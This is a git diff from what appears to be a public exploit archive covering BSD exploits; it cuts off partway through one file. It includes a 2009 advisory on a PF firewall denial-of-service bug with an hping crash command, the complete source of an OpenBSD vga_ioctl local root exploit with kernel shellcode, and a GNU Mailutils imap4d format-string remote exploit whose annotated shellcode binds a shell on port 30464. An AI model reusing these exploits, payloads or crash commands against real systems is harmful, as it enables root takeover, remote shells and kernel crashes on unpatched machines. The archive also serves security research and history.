would be a IPv4 packet with a ICMPv6 payload. - -This affects multiple vendors because PF was incorporated into serveral OS. - -The problem stems from the unification of the rule processing in pf_test_rule(). -With this unification ICMPv6 logic was applied to IPv4 packets and vice versa. -Because the handling logic asserts that the common code in pf_test has verified -that the packet contains a full ICMP header and has pulled up the mbuf up to -that point. This assertion fails when the wrong AF-version is used by pf_test -and thus pf_test_rule tries to access not allocated memory. -The affected function is in pf_change_a6 and the patch is just a workaround -because it filters the packet in pf_test() except of fixing the affected source -code. 
- - -Steps to reproduce: - -If you have an affected OS in your network which does NAT or redirecting traffic -you should be able to test your IPv4 device with this simple hping command: - -hping -0 -H 58 $a_host - - -Patches are provided for: - -OpenBSD 4.3 - 4.5 (not for 4.2), HEAD after 2009-04-11 -NetBSD 4.x (patched for consistency) - 5.0RC3, HEAD after 2009-04-13 -MirBSD 10 -MidnightBSD 0.3-current - - -Workaround: - -The OpenBSD developers provide hints for a workaround at their errata -website too. - - -We like to thank the security teams of the following projects for -their friendly cooperation: - -DragonflyBSD -NetBSD -FreeBSD -MidnightBSD -MirBSD - -Special thanks goes to Andreas Bogk who assisted in the assembly analysis and -Adrian Portelli of the NetBSD project for his time and permanent suggestions. - - -Kind regards, -Rembrandt - -# milw0rm.com [2009-04-30] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Rembrandt +Date : 2009-04-30 +Found : 2009-04-09 +Affected Software: PF (OpenBSD Packet Filter) +Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11 + NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13 + MirOS #10 and earlier + MidnightBSD 0.3-current +Not affected OS : FreeBSD + NetBSD 3.x, 4.x, 5.x (patched before release) + DragonflyBSD + Debian GNU/kFreeBSD + MidnightBSD prior 0.3 + + Older versions of OpenBSD PF and products based + thereon might be affected as well. + The Bug was introduced between the OpenBSD 4.1 and 4.2 + release. 
+ +Type : Denial of Service + +OSVDB : 53608 +Milw0rm : 8406 +CVE : +ISS X-Force: : +BID : 34482 +Secunia : 34676 +VUPEN ID : ADV-2009-1015 + +This advisory supercedes the original advisory which was just related to +OpenBSD because we had to publish an announcement in response to OpenBSD's +reaction. + +Trying to fix it responsibly and get in contact with the vendor: + +-- OpenBSD -- +Contacted 2009-04-09 16:35 UTC +Patch available 2009-04-11 23:43 UTC + +We received no response nor a notification about an upcoming patch. +Also we had no chance to coordinate or inform other projects before OpenBSD +issued the patch and a statement. + +We like to mention that the issued patch is just a workaround and does not +patch or remove the affected code. + +-- NetBSD -- +Contacted and asked for confirmation 2009-04-15 06:00 UTC +Were informed about further investigations 2009-04-15 9:42 UTC +Received information about upcoming Patches 2009-04-15 11:57 UTC +Received confirmation for 5.x up to RC3 and HEAD 2009-04-15 12:17 UTC + +We thank the NetBSD team that they patched the PF bug prior the 5.x release! 
+ +-- FreeBSD -- +Contacted and asked for confirmation 2009-04-15 06:56 UTC +Were informed about further investigations 2009-04-15 7:56 UTC +Were informed about not being vulnerable 2009-04-15 22:05 UTC + +-- DragonflyBSD -- +Contacted and asked for confirmation 2009-04-15 06:10 UTC +Were informed about not being vulnerable 2009-04-15 21:35 UTC + +-- MirOS (MirBSD) -- +Contacted and asked for official confirmation 2009-04-15 06:36 UTC +Received confirmation for MirBSD 10 and prior 2009-04-15 17:57 UTC + +-- MidnightBSD -- +Contacted and asked for official confirmation 2009-04-15 20:17 UTC +Received confirmation for MidnightBSD 2009-04-15 22:37 UTC + +-- Debian GNU/kFreeBSD -- +Contacted and asked for official confirmation 2009-04-15 22:41 UTC +Were informed about not being vulnerable 2009-04-15 23:35 UTC +-- END -- + + +OpenBSDs PF firewall is prone to a remote Denial of Service due to a NULL- +pointer dereference when handling special crafted IP datagrams. If the +firewall handles such a packet the kernel panics. +An example for such a packet would be a IPv4 packet with a ICMPv6 payload. + +This affects multiple vendors because PF was incorporated into serveral OS. + +The problem stems from the unification of the rule processing in pf_test_rule(). +With this unification ICMPv6 logic was applied to IPv4 packets and vice versa. +Because the handling logic asserts that the common code in pf_test has verified +that the packet contains a full ICMP header and has pulled up the mbuf up to +that point. This assertion fails when the wrong AF-version is used by pf_test +and thus pf_test_rule tries to access not allocated memory. +The affected function is in pf_change_a6 and the patch is just a workaround +because it filters the packet in pf_test() except of fixing the affected source +code. 
+ + +Steps to reproduce: + +If you have an affected OS in your network which does NAT or redirecting traffic +you should be able to test your IPv4 device with this simple hping command: + +hping -0 -H 58 $a_host + + +Patches are provided for: + +OpenBSD 4.3 - 4.5 (not for 4.2), HEAD after 2009-04-11 +NetBSD 4.x (patched for consistency) - 5.0RC3, HEAD after 2009-04-13 +MirBSD 10 +MidnightBSD 0.3-current + + +Workaround: + +The OpenBSD developers provide hints for a workaround at their errata +website too. + + +We like to thank the security teams of the following projects for +their friendly cooperation: + +DragonflyBSD +NetBSD +FreeBSD +MidnightBSD +MirBSD + +Special thanks goes to Andreas Bogk who assisted in the assembly analysis and +Adrian Portelli of the NetBSD project for his time and permanent suggestions. + + +Kind regards, +Rembrandt + +# milw0rm.com [2009-04-30] diff --git a/platforms/bsd/dos/869.c b/platforms/bsd/dos/869.c index 8c2b26aee..17f0a23f2 100755 --- a/platforms/bsd/dos/869.c +++ b/platforms/bsd/dos/869.c @@ -144,6 +144,6 @@ return EX_NOHOST; printf("Packet sent. Remote machine should crash.\n"); shutdown(mysock, 2); return EX_OK; -} - -// milw0rm.com [2005-03-09] +} + +// milw0rm.com [2005-03-09] diff --git a/platforms/bsd/local/118.c b/platforms/bsd/local/118.c index 00ce9fc90..637504e93 100755 --- a/platforms/bsd/local/118.c +++ b/platforms/bsd/local/118.c @@ -315,6 +315,6 @@ write(fd,&xep,sizeof(xep)); write(fd,exe,sizeof(exe)); printf("Now exec %s\n",fil); -} - -// milw0rm.com [2003-11-07] +} + +// milw0rm.com [2003-11-07] diff --git a/platforms/bsd/local/125.c b/platforms/bsd/local/125.c index f0488e698..b6fb83f95 100755 --- a/platforms/bsd/local/125.c +++ b/platforms/bsd/local/125.c @@ -311,6 +311,6 @@ get_proc(pid_t pid, struct kinfo_proc *kp) exit(-1); } -} - -// milw0rm.com [2003-11-19] +} + +// milw0rm.com [2003-11-19] diff --git a/platforms/bsd/local/200.c b/platforms/bsd/local/200.c index 37d7e4d92..41d1bfb26 100755 
--- a/platforms/bsd/local/200.c
+++ b/platforms/bsd/local/200.c
@@ -30,6 +30,6 @@ int main(int argc,char **argv){
 exit(1);
 }
 }
-
-
-// milw0rm.com [2000-11-21]
+
+
+// milw0rm.com [2000-11-21]
diff --git a/platforms/bsd/local/202.c b/platforms/bsd/local/202.c
index 8ceb2010a..2bd3a240e 100755
--- a/platforms/bsd/local/202.c
+++ b/platforms/bsd/local/202.c
@@ -82,6 +82,6 @@ main()
 }
 exit(0);
 }
-
-
-// milw0rm.com [2000-11-21]
+
+
+// milw0rm.com [2000-11-21]
diff --git a/platforms/bsd/local/207.c b/platforms/bsd/local/207.c
index 760ae49c3..e964f1061 100755
--- a/platforms/bsd/local/207.c
+++ b/platforms/bsd/local/207.c
@@ -34,6 +34,6 @@ int main(int argc,char **argv){
 exit(1);
 }
 }
-
-
-// milw0rm.com [2000-11-30]
+
+
+// milw0rm.com [2000-11-30]
diff --git a/platforms/bsd/local/243.c b/platforms/bsd/local/243.c
index c87878e43..0bb91f3f4 100755
--- a/platforms/bsd/local/243.c
+++ b/platforms/bsd/local/243.c
@@ -116,6 +116,6 @@ code);
 execve("/usr/bin/chpass", args, envs);
 perror("execve");
 }
-
-
-// milw0rm.com [2001-01-12]
+
+
+// milw0rm.com [2001-01-12]
diff --git a/platforms/bsd/local/3094.c b/platforms/bsd/local/3094.c
index 9285d9019..7c9d28a9b 100755
--- a/platforms/bsd/local/3094.c
+++ b/platforms/bsd/local/3094.c
@@ -1,133 +1,133 @@
-/*
-
-Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit
-
-Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)
-Some code had been stolen from noir's openbsd exploit sources
-
-Fix is available:
-ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch
-
-Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007
-
-Linkejimai neegzistuojancio fronto kariams ;]
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/
-#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/
-
-char shellcode[]=
-"\x18\x00\x00\x00"
-"\x18\x00\x00\x00"
-"\x18\x00\x00\x00" /* some crap */
-"\x18\x00\x00\x00"
-"\x18\x00\x00\x00"
-
-"\x18\x00\x00\x00" /* jmp 0x00000018 */
-
-"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad"
-"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */
-"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04"
-
-"\xb8\x51\x47\x48\xd0"
-"\xff\xe0";
-
-void usage()
-{
-printf("Usage: crit_obsd_ex target\n\n");
-printf("valid targets:\n");
-printf("(1)\tobsd 4.0 generic i386\n");
-printf("(2)\tobsd 3.9 generic i386\n\n");
-exit(0);
-}
-
-void get_proc(pid_t pid, struct kinfo_proc *kp)
-{
- u_int arr[4], len;
-
- arr[0] = CTL_KERN;
- arr[1] = KERN_PROC;
- arr[2] = KERN_PROC_PID;
- arr[3] = pid;
- len = sizeof(struct kinfo_proc);
- if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
- perror("sysctl");
- printf("this is an unexpected error, rerun!\n");
- exit(-1);
- }
-}
-
-int main(int ac, char *av[])
-{
- int i;
- void *p;
- int fd,failas;
- u_long pprocadr;
- struct kinfo_proc kp;
-
-printf("\n+--------------------------------------------+\n");
-printf("| Critical Security local obsd root |\n");
-printf("+--------------------------------------------+\n\n");
-
-if (ac<2) usage();
-if(atoi(av[1])==1)
-{
-for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i];
-}
-else if(atoi(av[1])==2)
-{
-for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i];
-}
-else {usage();}
-
- get_proc((pid_t) getpid(), &kp);
- pprocadr = (u_long) kp.kp_eproc.e_paddr;
-
- shellcode[24+5] = pprocadr & 0xff;
- shellcode[24+6] = (pprocadr >> 8) & 0xff;
- shellcode[24+7] = (pprocadr >> 16) & 0xff;
- shellcode[24+8] = (pprocadr >> 24) & 0xff;
-
- printf("[~] shellcode size: %d\n",sizeof(shellcode));
-
- fd=open("/tmp/. ", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR);
- if(fd < 0)
- err(1, "open");
-
- write(fd, shellcode, sizeof(shellcode));
- if((lseek(fd, 0L, SEEK_SET)) < 0)
- err(1, "lseek");
-
- p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0);
- if (p == MAP_FAILED)
- err(1, "mmap");
-
- printf("[~] map addr: 0x%x\n",p);
- printf("[~] exploiting...\n");
- failas = open(AGP_DEVICE, O_RDWR);
- syscall(SYS_ioctl, failas, 0x80044103, NULL);
-
- close(failas);
- close(fd);
-
- seteuid(0);
- setuid(0);
- printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid());
- execl("/bin/sh", "cyber", NULL);
-
-}
-
-// milw0rm.com [2007-01-07]
+/*
+
+Critical Security OpenBSD 3.x-4.0 vga_ioctl() root exploit
+
+Bug had been discovered by allmighty Ilja van Sprundel (ilja.netric.org)
+Some code had been stolen from noir's openbsd exploit sources
+
+Fix is available:
+ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.0/i386/007_agp.patch
+
+Critical Security [http://www.critical.lt], Lithuania, Vilnius, 2007
+
+Linkejimai neegzistuojancio fronto kariams ;]
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define TARGET1 "\x51\x47\x48\xd0" /* 0xd0484751 obsd 4.0 generic i386*/
+#define TARGET2 "\xa9\x42\x10\xd0" /* 0xd01042a9 obsd 3.9 generic i386*/
+
+char shellcode[]=
+"\x18\x00\x00\x00"
+"\x18\x00\x00\x00"
+"\x18\x00\x00\x00" /* some crap */
+"\x18\x00\x00\x00"
+"\x18\x00\x00\x00"
+
+"\x18\x00\x00\x00" /* jmp 0x00000018 */
+
+"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad"
+"\xde\xad\xde\xef\xbe\x90\x90\x90\x5f\x8b\x0f\x8b" /* p_cred & u_cred shellcode */
+"\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89\x42\x04"
+
+"\xb8\x51\x47\x48\xd0"
+"\xff\xe0";
+
+void usage()
+{
+printf("Usage: crit_obsd_ex target\n\n");
+printf("valid targets:\n");
+printf("(1)\tobsd 4.0 generic i386\n");
+printf("(2)\tobsd 3.9 generic i386\n\n");
+exit(0);
+}
+
+void get_proc(pid_t pid, struct kinfo_proc *kp)
+{
+ u_int arr[4], len;
+
+ arr[0] = CTL_KERN;
+ arr[1] = KERN_PROC;
+ arr[2] = KERN_PROC_PID;
+ arr[3] = pid;
+ len = sizeof(struct kinfo_proc);
+ if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
+ perror("sysctl");
+ printf("this is an unexpected error, rerun!\n");
+ exit(-1);
+ }
+}
+
+int main(int ac, char *av[])
+{
+ int i;
+ void *p;
+ int fd,failas;
+ u_long pprocadr;
+ struct kinfo_proc kp;
+
+printf("\n+--------------------------------------------+\n");
+printf("| Critical Security local obsd root |\n");
+printf("+--------------------------------------------+\n\n");
+
+if (ac<2) usage();
+if(atoi(av[1])==1)
+{
+for(i=0;i<4;i++)shellcode[61+i]=TARGET1[i];
+}
+else if(atoi(av[1])==2)
+{
+for(i=0;i<4;i++)shellcode[61+i]=TARGET2[i];
+}
+else {usage();}
+
+ get_proc((pid_t) getpid(), &kp);
+ pprocadr = (u_long) kp.kp_eproc.e_paddr;
+
+ shellcode[24+5] = pprocadr & 0xff;
+ shellcode[24+6] = (pprocadr >> 8) & 0xff;
+ shellcode[24+7] = (pprocadr >> 16) & 0xff;
+ shellcode[24+8] = (pprocadr >> 24) & 0xff;
+
+ printf("[~] shellcode size: %d\n",sizeof(shellcode));
+
+ fd=open("/tmp/. 
", O_RDWR|O_CREAT, S_IRUSR|S_IWUSR); + if(fd < 0) + err(1, "open"); + + write(fd, shellcode, sizeof(shellcode)); + if((lseek(fd, 0L, SEEK_SET)) < 0) + err(1, "lseek"); + + p=mmap(0, sizeof(shellcode), PROT_READ|PROT_EXEC, MAP_FIXED, fd, 0); + if (p == MAP_FAILED) + err(1, "mmap"); + + printf("[~] map addr: 0x%x\n",p); + printf("[~] exploiting...\n"); + failas = open(AGP_DEVICE, O_RDWR); + syscall(SYS_ioctl, failas, 0x80044103, NULL); + + close(failas); + close(fd); + + seteuid(0); + setuid(0); + printf("[~] uid: %d euid: %d gid: %d \n", getuid(), geteuid(),getgid()); + execl("/bin/sh", "cyber", NULL); + +} + +// milw0rm.com [2007-01-07] diff --git a/platforms/bsd/local/396.c b/platforms/bsd/local/396.c index 05349f471..ddb52dcbd 100755 --- a/platforms/bsd/local/396.c +++ b/platforms/bsd/local/396.c @@ -122,6 +122,6 @@ strncpy(tmp, p, 20); mkd(tmp); printf("pwd\r\n"); } - - -// milw0rm.com [2002-01-01] + + +// milw0rm.com [2002-01-01] diff --git a/platforms/bsd/local/579.sh b/platforms/bsd/local/579.sh index 1d46b4a85..ab178bf7b 100755 --- a/platforms/bsd/local/579.sh +++ b/platforms/bsd/local/579.sh @@ -39,6 +39,6 @@ EOF /bin/chmod 755 ./netstat echo "trying to exploit" -PATH=./ "${BMON_EXEC}" -n - -# milw0rm.com [2004-10-16] +PATH=./ "${BMON_EXEC}" -n + +# milw0rm.com [2004-10-16] diff --git a/platforms/bsd/local/739.c b/platforms/bsd/local/739.c index 6a03e6ef5..7873b8f95 100755 --- a/platforms/bsd/local/739.c +++ b/platforms/bsd/local/739.c @@ -73,6 +73,6 @@ main(void) putenv(scbuf); system("/bin/bash"); -} - -// milw0rm.com [2001-07-23] +} + +// milw0rm.com [2001-07-23] diff --git a/platforms/bsd/remote/1234.c b/platforms/bsd/remote/1234.c index 516250ad6..158bb7fd7 100755 --- a/platforms/bsd/remote/1234.c +++ b/platforms/bsd/remote/1234.c 
@@ -1,483 +1,483 @@
-/*
-* Copyright (c) 2005 Rosiello Security
-* http://www.rosiello.org
-*
-* Permission is granted for the redistribution of this software
-* electronically. It may not be edited in any way without the express
-* written consent of Rosiello Security.
-*
-* Disclaimer: The author published the information under the condition
-* that is not in the intention of the reader to use them in order to bring
-* to himself or others a profit or to bring to others damage.
-*
-* --------------------------------------------------------------------------
-*
-* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
-* iDEFENSE Security Advisory 09.09.05
-* www.idefense.com/application/poi/display?id=303&type=vulnerabilities
-*
-* The GNU mailutils package is a collection of mail-related
-* utilities, including local and remote mailbox access services.
-* More information is available at the following site:
-* http://www.gnu.org/software/mailutils/mailutils.html
-*
-* This exploit shows the possibility to run arbitrary code
-* on FreeBSD machines.
-*
-* Authors: Johnny Mast and Angelo Rosiello
-* e-mails: rave@rosiello.org angelo@rosiello.org
-*/
-
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-#include
-
-#include
-#include
-#include
-#include
-
-
-#define ISIP(m) (!((int)inet_addr(m) ==-1))
-#define clean(x) memset(x, 0 , sizeof x)
-
-char code[] =
-"\x90\x90\x90\x90"
-"\x90\x90\x90\x90"
-"\x90\x90\x90\x90"
-"\x31\xc0" /* xor %eax,%eax */
-"\x31\xc0" /* xor %eax,%eax */
-"\x50" /* push %eax */
-"\x31\xc0" /* xor %eax,%eax */
-"\x50" /* push %eax */
-"\xb0\x7e" /* mov $0x7e,%al */
-"\x50" /* push %eax */
-"\xcd\x80" /* int $0x80 */
-"\x31\xc0" /* xor %eax,%eax */
-
-/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
-"\x31\xc0" // xorl %eax,%eax
-"\x31\xdb" // xorl %ebx,%ebx
-"\x31\xc9" // xorl %ecx,%ecx
-"\x31\xd2" // xorl %edx,%edx
-"\xb0\x61" // movb $0x61,%al
-"\x51" // pushl %ecx
-"\xb1\x06" // movb $0x6,%cl
-"\x51" // pushl %ecx
-"\xb1\x01" // movb $0x1,%cl
-"\x51" // pushl %ecx
-"\xb1\x02" // movb $0x2,%cl
-"\x51" // pushl %ecx
-"\x8d\x0c\x24" // leal (%esp),%ecx
-"\x51" // pushl %ecx
-"\xcd\x80" // int $0x80
-
-/* it binds on port 30464 */
-/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */
-"\xb1\x02" // movb $0x2,%cl
-"\x31\xc9" // xorl %ecx,%ecx
-"\x51" // pushl %ecx
-"\x51" // pushl %ecx
-"\x51" // pushl %ecx
-
-/* port = 0x77, change if needed */
-"\x80\xc1\x77" // addb $0x77,%cl
-"\x66\x51" // pushw %cx
-"\xb5\x02" // movb $0x2,%ch
-"\x66\x51" // pushw %cx
-"\x8d\x0c\x24" // leal (%esp),%ecx
-"\xb2\x10" // movb $0x10,%dl
-"\x52" // pushl %edx
-"\x51" // pushl %ecx
-"\x50" // pushl %eax
-"\x8d\x0c\x24" // leal (%esp),%ecx
-"\x51" // pushl %ecx
-"\x89\xc2" // movl %eax,%edx
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x68" // movb $0x68,%al
-"\xcd\x80" // int $0x80
-
-/* listen(fd, 1)*/
-"\xb3\x01" // movb $0x1,%bl
-"\x53" // pushl %ebx
-"\x52" // pushl %edx
-"\x8d\x0c\x24" // leal (%esp),%ecx
-"\x51" // pushl %ecx
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x6a" // movb $0x6a,%al
-"\xcd\x80" // int $0x80
-
-/* cli = accept(fd, 0,0) */
-"\x31\xc0" // xorl %eax,%eax
-"\x50" // pushl %eax
-"\x50" // pushl %eax
-"\x52" // pushl %edx
-"\x8d\x0c\x24" // leal (%esp),%ecx
-"\x51" // pushl %ecx
-"\x31\xc9" // xorl %ecx,%ecx
-"\xb0\x1e" // movb $0x1e,%al
-"\xcd\x80" // int $0x80
-
-/* dup2(cli,0) */
-"\x89\xc3" // movl %eax,%ebx
-"\x53" // pushl %ebx
-"\x51" // pushl %ecx
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x5a" // movb $0x5a,%al
-"\xcd\x80" // int $0x80
-
-/* dup2(cli, 1) */
-"\x41" // inc %ecx
-"\x53" // pushl %ebx
-"\x51" // pushl %ecx
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x5a" // movb $0x5a,%al
-"\xcd\x80" // int $0x80
-
-/* dup2(cli, 2) */
-"\x41" // inc %ecx
-"\x53" // pushl %ebx
-"\x51" // pushl %ecx
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x5a" // movb $0x5a,%al
-"\xcd\x80" // int $0x80
-
-/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */
-"\x31\xdb" // xorl %ebx,%ebx
-"\x53" // pushl %ebx
-"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
-"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
-"\x89\xe3" // movl %esp,%ebx
-"\x31\xc0" // xorl %eax,%eax
-"\x50" // pushl %eax
-"\x54" // pushl %esp
-"\x53" // pushl %ebx
-"\x50" // pushl %eax
-"\xb0\x3b" // mov $0x3b,%al
-"\xcd\x80" // int $0x80
-
-/* exit(..) */
-"\x31\xc0" // xorl %eax,%eax
-"\xb0\x01" // mobv $0x1,%al
-"\xcd\x80"; // int $0x80
-
-
-
-void usage( int argc, char **argv )
-{
-
- fprintf(stdout, "%s usage:\n\n", argv[0]);
- fprintf(stdout, "\t-h host\n");
- fprintf(stdout, "\t-p port\n");
- fprintf(stdout, "\t-l login\n");
- fprintf(stdout, "\t-a password\n\n");
-
- return;
-}
-
-
-void send_message( int fd, char *msg, ... )
-{
- char string[2000];
- int len;
- size_t size;
-
- va_list args;
-
-
- clean(string);
-
-
- va_start(args, msg);
- len = vsnprintf(string, sizeof(string)-1, msg,args);
- len = (len >=0) ?
len : 0; - - /* Terminating the string */ - string[len]='\0'; - - write(fd, string, len); - - return; -} - - - - - -char *buildstring( long r_addr, long target, int offset, int sock ) -{ - unsigned char string[512], a[4]; - int len; - int high, low, arw; - - - - high = ( target & 0xffff0000 ) >> 16; - low = ( target & 0x0000ffff ); - - clean(a); - a[0] = (r_addr >> 24) & 0xff; - a[1] = (r_addr >> 16) & 0xff; - a[2] = (r_addr >> 8) & 0xff; - a[3] = (r_addr) & 0xff; - a[4] = '\0'; - - clean(string); - len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n", - (int)a[3]+2,a[2],a[1],a[0], - high -(0x24+13), /* Number of bytes for the first write */ - offset /* The Offset to addr */ - ); - - len = (len >=0) ? len : 0; - string[len] = '\0'; - write(sock, string, len); - - read(sock, string, sizeof(string)); - - - clean(string); - len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n", - (int) a[3], (int)a[2], (int)a[1],(int)a[0], - low - (0x24 +13), - offset, /* The offset to addr +2 */ - code - ); - - len = (len >=0) ? 
len : 0; - string[len] = '\0'; - write(sock, string, len); - - - return (char *)strdup(string); -} - - -void get_addr_as_char( u_int addr, char *buf ) -{ - *(u_int*)buf = addr; - if (!buf[0]) buf[0]++; - if (!buf[1]) buf[1]++; - if (!buf[2]) buf[2]++; - if (!buf[3]) buf[3]++; -} - -static int got_entry = 0x08057a0c+4; - - -int comun( char *host, struct sockaddr_in sin4 ) -{ - char *a[4] = { "/usr/bin/telnet", host , "30464", NULL }; - execve(a[0],a, NULL); - return 0; -} - -void welcome( ) -{ - fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" ); - fprintf( stdout, "http://www.rosiello.org\n" ); - fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" ); -} - -int main( int argc, char **argv ) -{ - struct hostent *hp; - struct sockaddr_in sin4; - char shellbuf[1030]; - char *host, buffer[512], *ptr, *p, *USER, *PASS; - int ch, port = 0, sock, offset = 1; - int login = 0, i, calc = 0; - int ret = 0, len = 0, b; - int have_shell_loc = 0; - unsigned int shell_addr = (u_int)0x0806c000; - - welcome( ); - - if ( argc < 9 ) - { - usage(argc, argv); - exit(EXIT_SUCCESS); - } - - if (!(host = malloc (128))) - { - fprintf(stderr, "exp.c:115 Could not allocate memory\n"); - exit(EXIT_FAILURE); - } - - - while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) - { - switch(ch) - { - case 'h': - host = (char *)strdup(optarg); - break; - - case 'V': - break; - - case 'p': - port = atoi (optarg); - break; - - case 'l': - USER = (char *)optarg; - break; - - case 'a': - PASS = (char *)optarg; - break; - - default: - usage(argc, argv); - break; - } -} - - - - if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) - { - fprintf(stderr, "exp.c:139 Error creating an new socket"); - exit(EXIT_FAILURE); - } - - host = (host) ? host : "localhost"; - port = (port) ? 
port : 143; - - if (!(ISIP(host))) - { - if (!(hp = gethostbyname(host))) - { - fprintf(stderr, "exp.c:152 Could not resolve ip address\n"); - exit(EXIT_FAILURE); - } - - memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length); - host = (char *)strdup(inet_ntoa(sin4.sin_addr)); - } else - sin4.sin_addr.s_addr = inet_addr(host); - - - - - sin4.sin_family = AF_INET; - sin4.sin_port = (unsigned short)htons( port ); - - fprintf(stdout, "[+] Connecting to %s:%d\n", host,port); - - if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0) - { - fprintf(stderr, "[*] exp.c:178 Connection failed\n"); - exit(EXIT_FAILURE); - } - - - fprintf(stdout, "[+] Connected .. \n"); - fprintf(stdout, "[+] Sending login ... \n"); - - send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS); - fprintf(stdout, "[+] Done ... \n"); - - while ((read(sock, buffer, 512)) > 0) - { - if ( login == 0 && ret == 0) - switch (buffer[0]) - { - - case '1': - fprintf(stdout, "[+] Selecting inbox ..\n"); - send_message(sock, "2 Select inbox\n"); - fprintf(stdout, "[+] Selecting Done .. 
Starting brute sequence\n"); - send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); - login = 1; - break; - } - - - if ((ptr=strstr(buffer, "(near")) && login == 1) - { - ptr +=15; - if ((strncmp(ptr, "41414141",8))!=0) - { - offset ++; - send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); - } - else - { - fprintf(stdout, "[+] Found offset %d\n", offset); - fprintf(stdout, "[+] Finding buffer on the stack\n"); - ret = 1; - login = 0; - clean(buffer); - } - } - - if ( ret == 1 ) - { - - if ((ptr=strstr(buffer, "(near"))) - { - ptr +=6+4 +1; /* +4 for the addr string*/ - /* +1 for the junk char */ - calc = strlen(buffer) - strlen(ptr); - calc -=6+4+1; - - for (i = 0; i < strlen(buffer); i++) - { - if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1) - { - shell_addr += i -4; - have_shell_loc = 1; - sleep(2); - buildstring(got_entry, shell_addr+=3, offset, sock); - fprintf(stdout,"[+] Decoy found at %p\n", shell_addr); - close(sock); - fprintf(stdout, "[+] Trying to contact the bind shell ..\n"); - if((comun(host, sin4)) < 0) - fprintf(stderr, "[-] Exploit failed\n"); - } - else - ++ptr; - } - } - if( shell_addr > 0xc0000000) - break; - shell_addr++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) - { - shell_addr ++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - } - while (strlen(ptr) !=4) - { - shell_addr++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - } - if (have_shell_loc != 1) - { - send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code); - } - } - clean(buffer); - } - - fprintf(stderr, "[+] Closing connection\n"); - close(sock); - free(host); - - fprintf(stderr, "[-] Exploit failed %p\n", shell_addr); - return 0; -} - -// milw0rm.com [2005-09-26] +/* +* Copyright (c) 2005 Rosiello Security +* http://www.rosiello.org +* +* Permission is granted for the redistribution of this software +* electronically. 
It may not be edited in any way without the express
+* written consent of Rosiello Security.
+*
+* Disclaimer: The author published the information under the condition
+* that is not in the intention of the reader to use them in order to bring
+* to himself or others a profit or to bring to others damage.
+*
+* --------------------------------------------------------------------------
+*
+* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
+* iDEFENSE Security Advisory 09.09.05
+* www.idefense.com/application/poi/display?id=303&type=vulnerabilities
+*
+* The GNU mailutils package is a collection of mail-related
+* utilities, including local and remote mailbox access services.
+* More information is available at the following site:
+* http://www.gnu.org/software/mailutils/mailutils.html
+*
+* This exploit shows the possibility to run arbitrary code
+* on FreeBSD machines.
+*
+* Authors: Johnny Mast and Angelo Rosiello
+* e-mails: rave@rosiello.org angelo@rosiello.org
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+
+
+#define ISIP(m) (!((int)inet_addr(m) ==-1))
+#define clean(x) memset(x, 0 , sizeof x)
+
